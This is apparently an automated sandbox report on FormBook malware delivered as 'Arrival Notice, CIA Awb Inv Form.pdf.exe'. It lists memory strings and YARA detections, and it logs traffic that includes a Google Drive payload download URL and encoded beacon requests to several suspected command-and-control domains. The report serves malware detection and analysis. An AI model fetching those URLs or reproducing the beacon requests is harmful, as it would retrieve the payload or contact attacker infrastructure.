    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22625903435.0000000000918000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817443530.0000000000918000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22619512198.000000000091D000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22623529226.000000000091C000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22624760736.0000000000918000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22625903435.0000000000918000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817443530.0000000000918000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22619512198.000000000091D000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22623529226.000000000091C000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22624760736.0000000000918000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: explorer.exe, 00000007.00000000.22659836034.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22738052664.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22641184172.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22707875865.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22967614281.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22686996294.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22760864296.000000001067D000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
    Source: explorer.exe, 00000007.00000000.22755704421.000000000D59B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22655480693.000000000D59B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22985193767.000000000D59B000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%
    Source: explorer.exe, 00000007.00000000.22760864296.000000001067D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
    Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crl
    Source: explorer.exe, 00000007.00000000.22689085611.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22969621202.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22659836034.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22643182960.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22738052664.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22641184172.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22707875865.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22967614281.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22686996294.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22760864296.000000001067D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
    Source: NETSTAT.EXE, 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exeString found in binary or memory: http://s.symcb.com/universal-root.crl0
    Source: NETSTAT.EXE, 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exeString found in binary or memory: http://s.symcd.com06
    Source: explorer.exe, 00000007.00000000.22975794820.000000000A7C0000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.22635050466.0000000002FB0000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.22646529192.0000000009AB0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.micro
    Source: NETSTAT.EXE, 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exeString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
    Source: NETSTAT.EXE, 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exeString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
    Source: NETSTAT.EXE, 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
    Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmpString found in binary or memory: http://www.foreca.com
    Source: explorer.exe, 00000007.00000000.22689085611.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22969621202.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22643182960.00000000094EB000.00000004.00000001.sdmpString found in binary or memory: https://aka.ms/odirm
    Source: explorer.exe, 00000007.00000000.22689085611.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22969621202.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22643182960.00000000094EB000.00000004.00000001.sdmpString found in binary or memory: https://api.msn.com/
    Source: explorer.exe, 00000007.00000000.22763778263.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=a
    Source: explorer.exe, 00000007.00000000.22984664449.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22755147117.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22654970416.000000000D525000.00000004.00000001.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
    Source: explorer.exe, 00000007.00000000.22750707443.000000000D05E000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22980392582.000000000D05E000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22651288186.000000000D05E000.00000004.00000001.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
    Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o
    Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22659836034.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22707875865.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22760864296.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
    Source: explorer.exe, 00000007.00000000.22738052664.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22641184172.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22967614281.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22686996294.0000000009340000.00000004.00000001.sdmpString found in binary or memory: https://arc.msn.com
    Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg
    Source: explorer.exe, 00000007.00000000.22689085611.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22969621202.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22643182960.00000000094EB000.00000004.00000001.sdmpString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/index.html?mode=NewDeviceActivation
    Source: explorer.exe, 00000007.00000000.22689085611.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22969621202.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22643182960.00000000094EB000.00000004.00000001.sdmpString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/index.html?mode=NewDeviceActivationi
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22619512198.000000000091D000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22619512198.000000000091D000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
    Source: NETSTAT.EXE, 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exeString found in binary or memory: https://d.symcb.com/cps0%
    Source: NETSTAT.EXE, 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exeString found in binary or memory: https://d.symcb.com/rpa0
    Source: NETSTAT.EXE, 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exeString found in binary or memory: https://d.symcb.com/rpa0.
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22625529754.0000000000908000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22625903435.0000000000918000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817443530.0000000000918000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22623529226.000000000091C000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817351739.0000000000907000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22624760736.0000000000918000.00000004.00000001.sdmpString found in binary or memory: https://doc-14-5s-docs.googleusercontent.com/
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22816989245.00000000008D8000.00000004.00000020.sdmpString found in binary or memory: https://doc-14-5s-docs.googleusercontent.com/%%doc-14-5s-docs.googleusercontent.com
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817351739.0000000000907000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22624760736.0000000000918000.00000004.00000001.sdmpString found in binary or memory: https://doc-14-5s-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/nqfdtgt6
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22625903435.0000000000918000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817443530.0000000000918000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22623529226.000000000091C000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22624760736.0000000000918000.00000004.00000001.sdmpString found in binary or memory: https://doc-14-5s-docs.googleusercontent.com/tography
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22816876287.00000000008C2000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818584241.00000000023F0000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817051370.00000000008E0000.00000004.00000020.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22816876287.00000000008C2000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16igyruBeyi1SLH2lfqbjS2ggty9bFGFC
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22816876287.00000000008C2000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16igyruBeyi1SLH2lfqbjS2ggty9bFGFCB
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22816876287.00000000008C2000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16igyruBeyi1SLH2lfqbjS2ggty9bFGFCh&
    Source: explorer.exe, 00000007.00000000.22704620930.000000000D6D5000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22986677846.000000000D6D5000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22656652438.000000000D6D5000.00000004.00000001.sdmpString found in binary or memory: https://excel.office.com
    Source: explorer.exe, 00000007.00000000.22763778263.0000000010ADD000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22709261731.00000000109B4000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22661302850.00000000109B4000.00000004.00000001.sdmpString found in binary or memory: https://ims-na1.adobelogin.com/ims/authorize/v1?locale=en_us&client_id=AdobeReader9&redirect_uri=htt
    Source: explorer.exe, 00000007.00000000.22659836034.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22707875865.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22760864296.000000001067D000.00000004.00000001.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=0&ver=16&build=1
    Source: explorer.exe, 00000007.00000000.22704620930.000000000D6D5000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22986677846.000000000D6D5000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22656652438.000000000D6D5000.00000004.00000001.sdmpString found in binary or memory: https://outlook.com
    Source: explorer.exe, 00000007.00000000.22984417636.000000000D4F4000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22754900142.000000000D4F4000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22654737060.000000000D4F4000.00000004.00000001.sdmpString found in binary or memory: https://powerpoint.office.come
    Source: NETSTAT.EXE, 00000008.00000002.26929375069.00000000039BF000.00000004.00020000.sdmpString found in binary or memory: https://sedo.com/search/details/?partnerid=324561&language=e&domain=izivente.com&origin=sales_lander
    Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmpString found in binary or memory: https://windows.msn.com:443/shell
    Source: explorer.exe, 00000007.00000000.22704620930.000000000D6D5000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22986677846.000000000D6D5000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22656652438.000000000D6D5000.00000004.00000001.sdmpString found in binary or memory: https://word.office.com
    Source: explorer.exe, 00000007.00000000.22984664449.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22755147117.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22654970416.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22727056323.0000000000B94000.00000004.00000020.sdmp, explorer.exe, 00000007.00000000.22956960258.0000000000B94000.00000004.00000020.sdmp, explorer.exe, 00000007.00000000.22632233648.0000000000B94000.00000004.00000020.sdmpString found in binary or memory: https://www.digicert.com/CPS0
    Source: explorer.exe, 00000007.00000000.22984664449.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22755147117.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22654970416.000000000D525000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp
    Source: explorer.exe, 00000007.00000000.22984664449.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22755147117.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22654970416.000000000D525000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpA
    Source: explorer.exe, 00000007.00000000.22984664449.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22755147117.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22654970416.000000000D525000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
    Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGa
    Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/
    Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant
    Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin
    Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
    Source: unknownDNS traffic detected: queries for: drive.google.com
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16igyruBeyi1SLH2lfqbjS2ggty9bFGFC HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/nqfdtgt678la5ha3g2tbhed40e9h4e57/1637762850000/13904828925096904893/*/16igyruBeyi1SLH2lfqbjS2ggty9bFGFC?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-14-5s-docs.googleusercontent.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /s3f1/?0v=PTZX9bbDrHz+cSGvcymGk0mts24461Z1qQ1nyKxozOrcJ62jRcnhMEjPJVIjYEdLVzgY&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.izivente.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: GET /s3f1/?0v=djAV39Fd+2tTaJZ0vMg9wx3f2dAzn5uoNnRL0R1SzoIuCwqtHRucI/njP/LN+anlykG6&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.musee-radix-hairsalon.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: GET /s3f1/?0v=sqInqd/J1oF05xIRIYy6fIocxGbhQvf/UJ8WsTvvwcutrQRehAYuBiNZHMXnLC/ELIDP&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.teslafreesuperchargermiles.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: GET /s3f1/?0v=SHCw80AJpwYBr9Gcy19d9t3wNH3OULHDJ3WoL9xOYwR6hbrNjBBxIJP5Ay3SVk+aC6rM&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.mvsteals.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: GET /s3f1/?0v=mH/60k+8QaINko6jE2QpZl5PE74OV+HVH/ClSiWHQSmVZS7BQfRqR+Cg+8qmWPEHLuT3&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.thaicharuen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: GET /s3f1/?0v=UFnETU8dieTu408infxPFcIZ9A51JABruIfjxtzTo70f1rUHWxHKXlzNhsAQN9Kxpi4c&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.morningstarapparel.spaceConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: GET /s3f1/?0v=09o28MjQy1cZQ5Pjj+CLcbQvMAiWJGV2Uxg7+ScaYTXEQUafs3S8SGgaduHkLU6DHZH5&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.soarlikeaneagle.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: GET /s3f1/?0v=mbzqDKJ3zGVZXRXzBR45Cgdnnesr2+nRJSwniRIMGUaPxNPQA+ji5LfWApDcm/CqO18J&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.evaccines.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: GET /s3f1/?0v=NBR0aPdzKjxBJ/qIBF///end99Hz3MSBKbZXqSBgBb5XrtkET9he0lXIERUBepCdWUFS&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.celsb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: GET /s3f1/?0v=d8/OqiJyMkDaGTNTMgoxgiTtJv1BTsaVDDjuqFtpNub02Pcaaru29SvOabQgh8wWKZWy&hXeT=Wxlp HTTP/1.1Host: www.4mtechmachines.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: GET /s3f1/?0v=F/pbsBegFO7o3fLKo/FzEC9ZwTRXzaIgUSgpsvNThmOurZQxU5rRi5MGW6g3EwPdsbP6&hXeT=Wxlp HTTP/1.1Host: www.hara.cloudConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.11.20:49805 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49806 version: TLS 1.2

    E-Banking Fraud:

    barindex
    Yara detected FormBookShow sources
    Source: Yara matchFile source: 00000007.00000000.22694456011.000000000A598000.00000040.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000006.00000002.22826427639.000000001E760000.00000040.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.26924489179.0000000002D00000.00000040.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.26924755438.0000000002D30000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000007.00000000.22745903057.000000000A598000.00000040.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000006.00000002.22815363833.00000000000A0000.00000040.00020000.sdmp, type: MEMORY

    System Summary:

    barindex
    Malicious sample detected (through community Yara rule)Show sources
    Source: 00000007.00000000.22694456011.000000000A598000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 00000007.00000000.22694456011.000000000A598000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000006.00000002.22826427639.000000001E760000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 00000006.00000002.22826427639.000000001E760000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000008.00000002.26924489179.0000000002D00000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 00000008.00000002.26924489179.0000000002D00000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000008.00000002.26924755438.0000000002D30000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 00000008.00000002.26924755438.0000000002D30000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000007.00000000.22745903057.000000000A598000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 00000007.00000000.22745903057.000000000A598000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000006.00000002.22815363833.00000000000A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 00000006.00000002.22815363833.00000000000A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Initial sample is a PE file and has a suspicious nameShow sources
    Source: initial sampleStatic PE information: Filename: Arrival Notice, CIA Awb Inv Form.pdf.exe
    Source: initial sampleStatic PE information: Filename: Arrival Notice, CIA Awb Inv Form.pdf.exe
    Executable has a suspicious name (potential lure to open the executable)Show sources
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exeStatic file information: Suspicious name
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
    Source: 00000007.00000000.22694456011.000000000A598000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
    Source: 00000007.00000000.22694456011.000000000A598000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
